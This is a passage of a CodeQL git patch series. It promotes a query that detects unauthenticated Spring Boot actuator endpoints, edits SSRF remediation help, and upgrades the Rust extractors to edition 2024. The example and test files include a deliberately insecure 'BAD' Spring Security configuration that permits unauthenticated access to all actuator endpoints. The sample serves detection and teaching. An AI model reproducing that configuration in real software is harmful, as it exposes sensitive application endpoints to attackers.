a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql +++ b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.ql @@ -4,11 +4,11 @@ * or even to remote code execution. * @kind problem * @problem.severity error + * @security-severity 6.5 * @precision high * @id java/spring-boot-exposed-actuators * @tags security - * experimental - * external/cwe/cwe-16 + * external/cwe/cwe-200 */ import java diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.expected similarity index 100% rename from java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected rename to java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.expected diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java similarity index 100% rename from java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java rename to java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.ql similarity index 100% rename from java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql rename to java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.ql diff --git a/java/ql/test/query-tests/security/CWE-016/options b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/options similarity index 62% rename from java/ql/test/query-tests/security/CWE-016/options rename to java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/options index 38d1d754b69c..161a6ddf23d7 100644 --- a/java/ql/test/query-tests/security/CWE-016/options +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.3.8 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../../stubs/springframework-5.3.8 From 26e396732a334d02de6f56b013c62f6c3ae20501 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Mon, 24 Feb 2025 16:43:19 -0500 Subject: [PATCH 022/892] Java: edit qhelp --- .../CWE/CWE-200/SpringBootActuators.java | 33 ++++++++++--------- .../CWE/CWE-200/SpringBootActuators.qhelp | 27 +++++++-------- .../SpringBootActuatorsTest.java | 18 +++++----- 3 files changed, 39 insertions(+), 39 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java index 5aec49837cac..5f61127db288 100644 --- a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java +++ b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java @@ -1,22 +1,25 @@ @Configuration(proxyBeanMethods = false) -public class SpringBootActuators extends WebSecurityConfigurerAdapter { +public class CustomSecurityConfiguration { + + @Bean + public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { + // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); + return http.build(); + } - @Override - protected void configure(HttpSecurity http) throws Exception { - // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().permitAll()); - } } @Configuration(proxyBeanMethods = false) -public class ActuatorSecurity extends WebSecurityConfigurerAdapter { +public class CustomSecurityConfiguration { + + @Bean + public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { + // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().hasRole("ENDPOINT_ADMIN")); + return http.build(); + } - @Override - protected void configure(HttpSecurity http) throws Exception { - // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().hasRole("ENDPOINT_ADMIN")); - http.httpBasic(); - } } diff --git a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp index 53ee653aaff3..15675545c42f 100644 --- a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp +++ b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp @@ -3,24 +3,24 @@ "qhelp.dtd"> -

    Spring Boot includes a number of additional features called actuators that let you monitor -and interact with your web application. Exposing unprotected actuator endpoints via JXM or HTTP -can, however, lead to information disclosure or even to remote code execution vulnerability.

    +

    Spring Boot includes features called actuators that let you monitor and interact with your +web application. Exposing unprotected actuator endpoints can lead to information disclosure or +even to remote code execution.

     -

    Since actuator endpoints may contain sensitive information, careful consideration should be -given about when to expose them. You should take care to secure exposed HTTP endpoints in the same -way that you would any other sensitive URL. If Spring Security is present, endpoints are secured by -default using Spring Security’s content-negotiation strategy. If you wish to configure custom -security for HTTP endpoints, for example, only allow users with a certain role to access them, -Spring Boot provides some convenient RequestMatcher objects that can be used in -combination with Spring Security.

    +

    Since actuator endpoints may contain sensitive information, carefully consider when to expose them, +and secure them as you would any sensitive URL. Actuators are secured by default when using Spring +Security without a custom configuration. If you wish to define a custom security configuration, +consider only allowing users with certain roles access to the endpoints. +

    +

    In the first example, the custom security configuration allows unauthenticated access to all actuator endpoints. This may lead to sensitive information disclosure and should be avoided.

    +

    In the second example, only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints.

    @@ -29,11 +29,8 @@ the actuator endpoints.

  • -Spring Boot documentation: -Actuators. -
    • -
  • -Exploiting Spring Boot Actuators +Spring Boot Reference Documentation: +Endpoints.
    • diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java index 2f54cd442b50..4b5d7614eef6 100644 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java @@ -265,17 +265,17 @@ protected void configureOkNoPermitAll7_securityMatchers(HttpSecurity http) throw http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); } - // Spring doc example - // https://docs.spring.io/spring-boot/reference/actuator/endpoints.html#actuator.endpoints.security - public void securityFilterChain(HttpSecurity http) throws Exception { - http.securityMatcher(EndpointRequest.toAnyEndpoint()); - http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator - } + // QHelp Bad example + public void securityFilterChain1(HttpSecurity http) throws Exception { + // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } // QHelp Good example - protected void configureQhelpGood(HttpSecurity http) throws Exception { + public void securityFilterChain2(HttpSecurity http) throws Exception { // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().hasRole("ENDPOINT_ADMIN")); + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().hasRole("ENDPOINT_ADMIN")); } } From c2e859c756ac3e2370c359cec9051e078d53c6f2 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Mon, 24 Feb 2025 17:35:23 -0500 Subject: [PATCH 023/892] Java: add change note --- .../change-notes/2025-02-24-spring-boot-actuators-promo.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 java/ql/src/change-notes/2025-02-24-spring-boot-actuators-promo.md diff --git a/java/ql/src/change-notes/2025-02-24-spring-boot-actuators-promo.md b/java/ql/src/change-notes/2025-02-24-spring-boot-actuators-promo.md new file mode 100644 index 000000000000..0263df2c68c2 --- /dev/null +++ b/java/ql/src/change-notes/2025-02-24-spring-boot-actuators-promo.md @@ -0,0 +1,4 @@ +--- +category: newQuery +--- +* The query `java/spring-boot-exposed-actuators` has been promoted from experimental to the main query pack. Its results will now appear by default. This query was originally submitted as an experimental query [by @ggolawski](https://github.com/github/codeql/pull/2901). From 04476ca5f4a64d2348d82d5579e7c7d8ac5bd166 Mon Sep 17 00:00:00 2001 From: Kevin Stubbings Date: Tue, 25 Feb 2025 00:16:48 -0800 Subject: [PATCH 024/892] Add more choices to SSRF remediation --- .../CWE-918/ServerSideRequestForgery-end.inc.qhelp | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/python/ql/src/Security/CWE-918/ServerSideRequestForgery-end.inc.qhelp b/python/ql/src/Security/CWE-918/ServerSideRequestForgery-end.inc.qhelp index 2259680e9f8e..c40fe1d5711e 100644 --- a/python/ql/src/Security/CWE-918/ServerSideRequestForgery-end.inc.qhelp +++ b/python/ql/src/Security/CWE-918/ServerSideRequestForgery-end.inc.qhelp @@ -5,8 +5,11 @@

    To guard against SSRF attacks you should avoid putting user-provided input directly - into a request URL. Instead, either maintain a list of authorized URLs on the server and choose - from that list based on the input provided, or perform proper validation of the input. + into a request URL. On the application level, maintain a list of authorized URLs on the server and choose + from that list based on the input provided. If that is not possible, one should verify the IP address for all user-controlled + requests to ensure they are not private. This requires saving the verified IP address of each domain, + then utilizing a custom HTTP adapter to ensure that future requests to that domain use the verified IP address. + On the network level, you can segment the vulnerable application into its own LAN or block access to specific devices.

    From eff87d24fa3dfa9a57752c1ec34f816fbb8349c9 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:15:19 +0100 Subject: [PATCH 025/892] Rust/Ruby/Python: update rustc and edition --- MODULE.bazel | 4 ++-- python/extractor/tsg-python/Cargo.toml | 2 +- python/extractor/tsg-python/rust-toolchain.toml | 7 ------- python/extractor/tsg-python/tsp/Cargo.toml | 2 +- ruby/extractor/Cargo.toml | 2 +- ruby/extractor/rust-toolchain.toml | 7 ------- rust-toolchain.toml | 8 ++++++++ rust/ast-generator/Cargo.toml | 2 +- rust/autobuild/Cargo.toml | 2 +- rust/extractor/Cargo.toml | 2 +- rust/extractor/macros/Cargo.toml | 2 +- shared/tree-sitter-extractor/Cargo.toml | 2 +- shared/tree-sitter-extractor/rust-toolchain.toml | 7 ------- 13 files changed, 18 insertions(+), 31 deletions(-) delete mode 100644 python/extractor/tsg-python/rust-toolchain.toml delete mode 100644 ruby/extractor/rust-toolchain.toml create mode 100644 rust-toolchain.toml delete mode 100644 shared/tree-sitter-extractor/rust-toolchain.toml diff --git a/MODULE.bazel b/MODULE.bazel index 427f450e7fcf..c4a2526479a5 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -35,9 +35,9 @@ bazel_dep(name = "buildifier_prebuilt", version = "6.4.0", dev_dependency = True # Keep edition and version approximately in sync with internal repo. # the versions there are canonical, the versions here are used for CI in github/codeql, as well as for the vendoring of dependencies. -RUST_EDITION = "2021" +RUST_EDITION = "2024" -RUST_VERSION = "1.82.0" +RUST_VERSION = "1.85.0" rust = use_extension("@rules_rust//rust:extensions.bzl", "rust") rust.toolchain( diff --git a/python/extractor/tsg-python/Cargo.toml b/python/extractor/tsg-python/Cargo.toml index 259d2a7d353d..7ad2c1c949e6 100644 --- a/python/extractor/tsg-python/Cargo.toml +++ b/python/extractor/tsg-python/Cargo.toml @@ -4,7 +4,7 @@ name = "tsg-python" version = "0.1.0" authors = ["Taus Brock-Nannestad "] -edition = "2021" +edition = "2024" # When updating these dependencies, run `misc/bazel/3rdparty/update_cargo_deps.sh` [dependencies] diff --git a/python/extractor/tsg-python/rust-toolchain.toml b/python/extractor/tsg-python/rust-toolchain.toml deleted file mode 100644 index 5e0bcd3a4763..000000000000 --- a/python/extractor/tsg-python/rust-toolchain.toml +++ /dev/null @@ -1,7 +0,0 @@ -# This file specifies the Rust version used to develop and test the Python -# extractor. It is set to the lowest version of Rust we want to support. - -[toolchain] -channel = "1.74" -profile = "minimal" -components = [ "rustfmt" ] diff --git a/python/extractor/tsg-python/tsp/Cargo.toml b/python/extractor/tsg-python/tsp/Cargo.toml index 29fec37f442e..e36144566627 100644 --- a/python/extractor/tsg-python/tsp/Cargo.toml +++ b/python/extractor/tsg-python/tsp/Cargo.toml @@ -11,7 +11,7 @@ readme = "bindings/rust/README.md" keywords = ["incremental", "parsing", "python"] categories = ["parsing", "text-editors"] repository = "https://github.com/tree-sitter/tree-sitter-python" -edition = "2018" +edition = "2024" build = "bindings/rust/build.rs" include = [ diff --git a/ruby/extractor/Cargo.toml b/ruby/extractor/Cargo.toml index 89daac1d27e4..8d3a94113fa2 100644 --- a/ruby/extractor/Cargo.toml +++ b/ruby/extractor/Cargo.toml @@ -3,7 +3,7 @@ name = "codeql-extractor-ruby" description = "CodeQL Ruby extractor" version = "0.1.0" authors = ["GitHub"] -edition = "2021" +edition = "2024" # When updating these dependencies, run `misc/bazel/3rdparty/update_cargo_deps.sh` [dependencies] diff --git a/ruby/extractor/rust-toolchain.toml b/ruby/extractor/rust-toolchain.toml deleted file mode 100644 index aa02ff3d0bda..000000000000 --- a/ruby/extractor/rust-toolchain.toml +++ /dev/null @@ -1,7 +0,0 @@ -# This file specifies the Rust version used to develop and test the Ruby -# extractor. It is set to the lowest version of Rust we want to support. - -[toolchain] -channel = "1.74" -profile = "minimal" -components = [ "rustfmt" ] diff --git a/rust-toolchain.toml b/rust-toolchain.toml new file mode 100644 index 000000000000..60e431ae8835 --- /dev/null +++ b/rust-toolchain.toml @@ -0,0 +1,8 @@ +# This file specifies the Rust version used to develop and test the +# extractors written in rust. It is set to the lowest version of Rust +# we want to support. + +[toolchain] +channel = "1.85" +profile = "minimal" +components = [ "clippy", "rustfmt" ] diff --git a/rust/ast-generator/Cargo.toml b/rust/ast-generator/Cargo.toml index 6a2db2b0da82..d239ed3de089 100644 --- a/rust/ast-generator/Cargo.toml +++ b/rust/ast-generator/Cargo.toml @@ -1,7 +1,7 @@ [package] name = "ast-generator" version = "0.1.0" -edition = "2021" +edition = "2024" license = "MIT" # When updating these dependencies, run `rust/update_cargo_deps.sh` diff --git a/rust/autobuild/Cargo.toml b/rust/autobuild/Cargo.toml index 758ce92df295..240c1a89d482 100644 --- a/rust/autobuild/Cargo.toml +++ b/rust/autobuild/Cargo.toml @@ -1,7 +1,7 @@ [package] name = "codeql-autobuilder-rust" version = "0.1.0" -edition = "2021" +edition = "2024" [dependencies] codeql-extractor = { path = "../../shared/tree-sitter-extractor" } diff --git a/rust/extractor/Cargo.toml b/rust/extractor/Cargo.toml index dc58faa1ce25..3edcbc744db7 100644 --- a/rust/extractor/Cargo.toml +++ b/rust/extractor/Cargo.toml @@ -1,7 +1,7 @@ [package] name = "codeql-rust" version = "0.1.0" -edition = "2021" +edition = "2024" license = "MIT" # When updating these dependencies, run `rust/update_cargo_deps.sh` diff --git a/rust/extractor/macros/Cargo.toml b/rust/extractor/macros/Cargo.toml index 24c5ff5171f1..1f1c44b7d15d 100644 --- a/rust/extractor/macros/Cargo.toml +++ b/rust/extractor/macros/Cargo.toml @@ -1,7 +1,7 @@ [package] name = "rust-extractor-macros" version = "0.1.0" -edition = "2021" +edition = "2024" license = "MIT" [lib] diff --git a/shared/tree-sitter-extractor/Cargo.toml b/shared/tree-sitter-extractor/Cargo.toml index fba911e590fa..a24523e7afbc 100644 --- a/shared/tree-sitter-extractor/Cargo.toml +++ b/shared/tree-sitter-extractor/Cargo.toml @@ -1,7 +1,7 @@ [package] name = "codeql-extractor" version = "0.2.0" -edition = "2021" +edition = "2024" authors = ["GitHub"] # When updating these dependencies, run `misc/bazel/3rdparty/update_cargo_deps.sh` diff --git a/shared/tree-sitter-extractor/rust-toolchain.toml b/shared/tree-sitter-extractor/rust-toolchain.toml deleted file mode 100644 index fc7eb0871cd5..000000000000 --- a/shared/tree-sitter-extractor/rust-toolchain.toml +++ /dev/null @@ -1,7 +0,0 @@ -# This file specifies the Rust version used to develop and test the shared -# extractor. It is set to the lowest version of Rust we want to support. - -[toolchain] -channel = "1.74" -profile = "minimal" -components = [ "clippy", "rustfmt" ] \ No newline at end of file From e8799e346ddc2ccd9c6f6db0c228f6ad6955b52f Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:16:58 +0100 Subject: [PATCH 026/892] Rust/Python: fix edition-related errors --- python/extractor/tsg-python/tsp/bindings/rust/lib.rs | 2 +- rust/extractor/macros/src/lib.rs | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/python/extractor/tsg-python/tsp/bindings/rust/lib.rs b/python/extractor/tsg-python/tsp/bindings/rust/lib.rs index 7a58509e89cf..0d524b28d273 100644 --- a/python/extractor/tsg-python/tsp/bindings/rust/lib.rs +++ b/python/extractor/tsg-python/tsp/bindings/rust/lib.rs @@ -31,7 +31,7 @@ use tree_sitter::Language; -extern "C" { +unsafe extern "C" { fn tree_sitter_python() -> Language; } diff --git a/rust/extractor/macros/src/lib.rs b/rust/extractor/macros/src/lib.rs index b79f0cc29391..5ba496d4661d 100644 --- a/rust/extractor/macros/src/lib.rs +++ b/rust/extractor/macros/src/lib.rs @@ -96,7 +96,7 @@ pub fn extractor_cli_config(_attr: TokenStream, item: TokenStream) -> TokenStrea }) .collect::>(); - let gen = quote! { + let ret = quote! { #[serde_with::apply(_ => #[serde(default)])] #[derive(Deserialize, Default)] pub struct #name { @@ -118,5 +118,5 @@ pub fn extractor_cli_config(_attr: TokenStream, item: TokenStream) -> TokenStrea #(#cli_fields),* } }; - gen.into() + ret.into() } From 6089a7526288bd0c6c6d41c203c2f2f26eb1323e Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:19:03 +0100 Subject: [PATCH 027/892] Rust/Ruby/Python: format code --- python/extractor/tsg-python/src/main.rs | 12 ++++++------ rust/extractor/src/config.rs | 2 +- rust/extractor/src/config/deserialize.rs | 2 +- rust/extractor/src/diagnostics.rs | 2 +- rust/extractor/src/main.rs | 4 ++-- rust/extractor/src/rust_analyzer.rs | 2 +- rust/extractor/src/translate/base.rs | 10 +++++----- rust/extractor/src/translate/mappings.rs | 2 +- shared/tree-sitter-extractor/src/extractor/mod.rs | 12 ++++-------- .../tree-sitter-extractor/tests/integration_test.rs | 2 +- .../tests/multiple_languages.rs | 2 +- 11 files changed, 24 insertions(+), 28 deletions(-) diff --git a/python/extractor/tsg-python/src/main.rs b/python/extractor/tsg-python/src/main.rs index 942d36088538..c111ef194ead 100644 --- a/python/extractor/tsg-python/src/main.rs +++ b/python/extractor/tsg-python/src/main.rs @@ -7,17 +7,17 @@ use std::path::Path; -use anyhow::anyhow; use anyhow::Context as _; use anyhow::Result; -use clap::{Command, Arg, ArgAction}; +use anyhow::anyhow; +use clap::{Arg, ArgAction, Command}; use tree_sitter::Parser; -use tree_sitter_graph::ast::File; -use tree_sitter_graph::functions::Functions; use tree_sitter_graph::ExecutionConfig; use tree_sitter_graph::Identifier; use tree_sitter_graph::NoCancellation; use tree_sitter_graph::Variables; +use tree_sitter_graph::ast::File; +use tree_sitter_graph::functions::Functions; const BUILD_VERSION: &'static str = env!("CARGO_PKG_VERSION"); @@ -332,7 +332,7 @@ pub mod extra_functions { return Err(ExecutionError::FunctionFailed( "unnamed-child-index".into(), format!("Cannot call child-index on the root node"), - )) + )); } }; let mut tree_cursor = parent.walk(); @@ -490,7 +490,7 @@ fn main() -> Result<()> { .short('t') .long("tsg") .action(ArgAction::Set) - .required(false) + .required(false), ) .arg(Arg::new("source").index(1).required(true)) .get_matches(); diff --git a/rust/extractor/src/config.rs b/rust/extractor/src/config.rs index c87af7e77280..24fef22cff08 100644 --- a/rust/extractor/src/config.rs +++ b/rust/extractor/src/config.rs @@ -4,9 +4,9 @@ use anyhow::Context; use clap::Parser; use codeql_extractor::trap; use figment::{ + Figment, providers::{Env, Format, Serialized, Yaml}, value::Value, - Figment, }; use itertools::Itertools; use ra_ap_cfg::{CfgAtom, CfgDiff}; diff --git a/rust/extractor/src/config/deserialize.rs b/rust/extractor/src/config/deserialize.rs index 5953acd86057..4f3d96897909 100644 --- a/rust/extractor/src/config/deserialize.rs +++ b/rust/extractor/src/config/deserialize.rs @@ -1,5 +1,5 @@ -use serde::de::{Error, Unexpected, Visitor}; use serde::Deserializer; +use serde::de::{Error, Unexpected, Visitor}; use std::collections::HashMap; use std::fmt::Formatter; use std::hash::BuildHasher; diff --git a/rust/extractor/src/diagnostics.rs b/rust/extractor/src/diagnostics.rs index d111975db7d5..a39706a0cf28 100644 --- a/rust/extractor/src/diagnostics.rs +++ b/rust/extractor/src/diagnostics.rs @@ -2,8 +2,8 @@ use crate::config::Config; use anyhow::Context; use chrono::{DateTime, Utc}; use ra_ap_project_model::ProjectManifest; -use serde::ser::SerializeMap; use serde::Serialize; +use serde::ser::SerializeMap; use std::collections::HashMap; use std::fmt::Display; use std::fs::File; diff --git a/rust/extractor/src/main.rs b/rust/extractor/src/main.rs index 48445a935c30..17bf43b91c6f 100644 --- a/rust/extractor/src/main.rs +++ b/rust/extractor/src/main.rs @@ -1,11 +1,11 @@ -use crate::diagnostics::{emit_extraction_diagnostics, ExtractionStep}; +use crate::diagnostics::{ExtractionStep, emit_extraction_diagnostics}; use crate::rust_analyzer::path_to_file_id; use crate::trap::TrapId; use anyhow::Context; use archive::Archiver; use ra_ap_hir::Semantics; -use ra_ap_ide_db::line_index::{LineCol, LineIndex}; use ra_ap_ide_db::RootDatabase; +use ra_ap_ide_db::line_index::{LineCol, LineIndex}; use ra_ap_load_cargo::LoadCargoConfig; use ra_ap_paths::{AbsPathBuf, Utf8PathBuf}; use ra_ap_project_model::{CargoConfig, ProjectManifest}; diff --git a/rust/extractor/src/rust_analyzer.rs b/rust/extractor/src/rust_analyzer.rs index 2ebbcac6b590..f0ca9a223207 100644 --- a/rust/extractor/src/rust_analyzer.rs +++ b/rust/extractor/src/rust_analyzer.rs @@ -2,7 +2,7 @@ use itertools::Itertools; use ra_ap_base_db::SourceDatabase; use ra_ap_hir::Semantics; use ra_ap_ide_db::RootDatabase; -use ra_ap_load_cargo::{load_workspace_at, LoadCargoConfig}; +use ra_ap_load_cargo::{LoadCargoConfig, load_workspace_at}; use ra_ap_paths::{AbsPath, Utf8PathBuf}; use ra_ap_project_model::ProjectManifest; use ra_ap_project_model::{CargoConfig, ManifestPath}; diff --git a/rust/extractor/src/translate/base.rs b/rust/extractor/src/translate/base.rs index 9c8e919e5aa0..6618feae4c20 100644 --- a/rust/extractor/src/translate/base.rs +++ b/rust/extractor/src/translate/base.rs @@ -4,23 +4,23 @@ use crate::rust_analyzer::FileSemanticInformation; use crate::trap::{DiagnosticSeverity, TrapFile, TrapId}; use crate::trap::{Label, TrapClass}; use itertools::Either; -use ra_ap_base_db::ra_salsa::InternKey; use ra_ap_base_db::CrateOrigin; +use ra_ap_base_db::ra_salsa::InternKey; use ra_ap_hir::db::ExpandDatabase; use ra_ap_hir::{ Adt, Crate, ItemContainer, Module, ModuleDef, PathResolution, Semantics, Type, Variant, }; -use ra_ap_hir_def::type_ref::Mutability; use ra_ap_hir_def::ModuleId; +use ra_ap_hir_def::type_ref::Mutability; use ra_ap_hir_expand::ExpandTo; -use ra_ap_ide_db::line_index::{LineCol, LineIndex}; use ra_ap_ide_db::RootDatabase; +use ra_ap_ide_db::line_index::{LineCol, LineIndex}; use ra_ap_parser::SyntaxKind; use ra_ap_span::{EditionedFileId, TextSize}; use ra_ap_syntax::ast::HasName; use ra_ap_syntax::{ - ast, AstNode, NodeOrToken, SyntaxElementChildren, SyntaxError, SyntaxNode, SyntaxToken, - TextRange, + AstNode, NodeOrToken, SyntaxElementChildren, SyntaxError, SyntaxNode, SyntaxToken, TextRange, + ast, }; #[macro_export] diff --git a/rust/extractor/src/translate/mappings.rs b/rust/extractor/src/translate/mappings.rs index 6ad8a7d1df6f..3068e5cea52e 100644 --- a/rust/extractor/src/translate/mappings.rs +++ b/rust/extractor/src/translate/mappings.rs @@ -1,6 +1,6 @@ use ra_ap_hir::{Enum, Function, HasContainer, Module, Semantics, Struct, Trait, Union}; use ra_ap_ide_db::RootDatabase; -use ra_ap_syntax::{ast, ast::RangeItem, AstNode}; +use ra_ap_syntax::{AstNode, ast, ast::RangeItem}; pub(crate) trait TextValue { fn try_get_text(&self) -> Option; diff --git a/shared/tree-sitter-extractor/src/extractor/mod.rs b/shared/tree-sitter-extractor/src/extractor/mod.rs index fcefe87106cb..18a0cfc94520 100644 --- a/shared/tree-sitter-extractor/src/extractor/mod.rs +++ b/shared/tree-sitter-extractor/src/extractor/mod.rs @@ -7,13 +7,13 @@ use std::collections::BTreeSet as Set; use std::env; use std::path::Path; +use tracing_subscriber::EnvFilter; +use tracing_subscriber::Layer; use tracing_subscriber::filter::Filtered; use tracing_subscriber::fmt::format::DefaultFields; use tracing_subscriber::fmt::format::Format; use tracing_subscriber::layer::SubscriberExt; use tracing_subscriber::util::SubscriberInitExt; -use tracing_subscriber::EnvFilter; -use tracing_subscriber::Layer; use tree_sitter::{Language, Node, Parser, Range, Tree}; pub mod simple; @@ -591,11 +591,7 @@ impl<'a> Visitor<'a> { } } } - if is_valid { - Some(args) - } else { - None - } + if is_valid { Some(args) } else { None } } fn type_matches(&self, tp: &TypeName, type_info: &node_types::FieldTypeInfo) -> bool { @@ -615,7 +611,7 @@ impl<'a> Visitor<'a> { } node_types::FieldTypeInfo::ReservedWordInt(int_mapping) => { - return !tp.named && int_mapping.contains_key(&tp.kind) + return !tp.named && int_mapping.contains_key(&tp.kind); } } false diff --git a/shared/tree-sitter-extractor/tests/integration_test.rs b/shared/tree-sitter-extractor/tests/integration_test.rs index cc453eeef741..34d475df5d01 100644 --- a/shared/tree-sitter-extractor/tests/integration_test.rs +++ b/shared/tree-sitter-extractor/tests/integration_test.rs @@ -4,7 +4,7 @@ use codeql_extractor::trap; use tree_sitter_ql; mod common; -use common::{create_source_dir, expect_trap_file, SourceArchive}; +use common::{SourceArchive, create_source_dir, expect_trap_file}; /// A very simple happy-path test. /// We run the extractor using the tree-sitter-ql grammar and a single source file, diff --git a/shared/tree-sitter-extractor/tests/multiple_languages.rs b/shared/tree-sitter-extractor/tests/multiple_languages.rs index f14100f6e0c7..766de2bc7820 100644 --- a/shared/tree-sitter-extractor/tests/multiple_languages.rs +++ b/shared/tree-sitter-extractor/tests/multiple_languages.rs @@ -3,7 +3,7 @@ use codeql_extractor::trap; use tree_sitter_ql; mod common; -use common::{create_source_dir, expect_trap_file, SourceArchive}; +use common::{SourceArchive, create_source_dir, expect_trap_file}; /// Like the `simple_extractor` test but with multiple languages. /// This is in a separate crate because the simple extractor API sets up a From 1bcc6ddb3209c179e347e6368679f918faa2407b Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:21:28 +0100 Subject: [PATCH 028/892] Rust/Ruby/Python: apply clippy lints --- python/extractor/tsg-python/src/main.rs | 8 ++--- .../tsg-python/tsp/bindings/rust/build.rs | 4 +-- .../tsg-python/tsp/bindings/rust/lib.rs | 8 ++--- ruby/extractor/src/extractor.rs | 30 +++++++++---------- .../tree-sitter-extractor/src/diagnostics.rs | 2 +- .../src/generator/dbscheme.rs | 6 ++-- .../tree-sitter-extractor/src/generator/ql.rs | 16 +++++----- shared/tree-sitter-extractor/src/trap.rs | 12 ++++++-- .../tree-sitter-extractor/tests/common/mod.rs | 4 +-- .../tests/integration_test.rs | 1 - .../tests/multiple_languages.rs | 1 - 11 files changed, 48 insertions(+), 44 deletions(-) diff --git a/python/extractor/tsg-python/src/main.rs b/python/extractor/tsg-python/src/main.rs index c111ef194ead..6b72efdb6ef6 100644 --- a/python/extractor/tsg-python/src/main.rs +++ b/python/extractor/tsg-python/src/main.rs @@ -19,7 +19,7 @@ use tree_sitter_graph::Variables; use tree_sitter_graph::ast::File; use tree_sitter_graph::functions::Functions; -const BUILD_VERSION: &'static str = env!("CARGO_PKG_VERSION"); +const BUILD_VERSION: &str = env!("CARGO_PKG_VERSION"); pub mod extra_functions { use tree_sitter_graph::functions::{Function, Parameters}; @@ -331,7 +331,7 @@ pub mod extra_functions { None => { return Err(ExecutionError::FunctionFailed( "unnamed-child-index".into(), - format!("Cannot call child-index on the root node"), + "Cannot call child-index on the root node".to_string(), )); } }; @@ -342,7 +342,7 @@ pub mod extra_functions { .ok_or_else(|| { ExecutionError::FunctionFailed( "unnamed-child-index".into(), - format!("Called child-index on a non-named child"), + "Called child-index on a non-named child".to_string(), ) })?; Ok(Value::Integer(index as u32)) @@ -400,7 +400,7 @@ pub mod extra_functions { let parent = node.parent().ok_or_else(|| { ExecutionError::FunctionFailed( "get-parent".into(), - format!("Cannot call get-parent on the root node"), + "Cannot call get-parent on the root node".to_string(), ) })?; Ok(Value::SyntaxNode(graph.add_syntax_node(parent))) diff --git a/python/extractor/tsg-python/tsp/bindings/rust/build.rs b/python/extractor/tsg-python/tsp/bindings/rust/build.rs index 4450166885e2..74c445ae32ee 100644 --- a/python/extractor/tsg-python/tsp/bindings/rust/build.rs +++ b/python/extractor/tsg-python/tsp/bindings/rust/build.rs @@ -5,7 +5,7 @@ fn main() { let src_dir = Path::new("src"); let mut c_config = 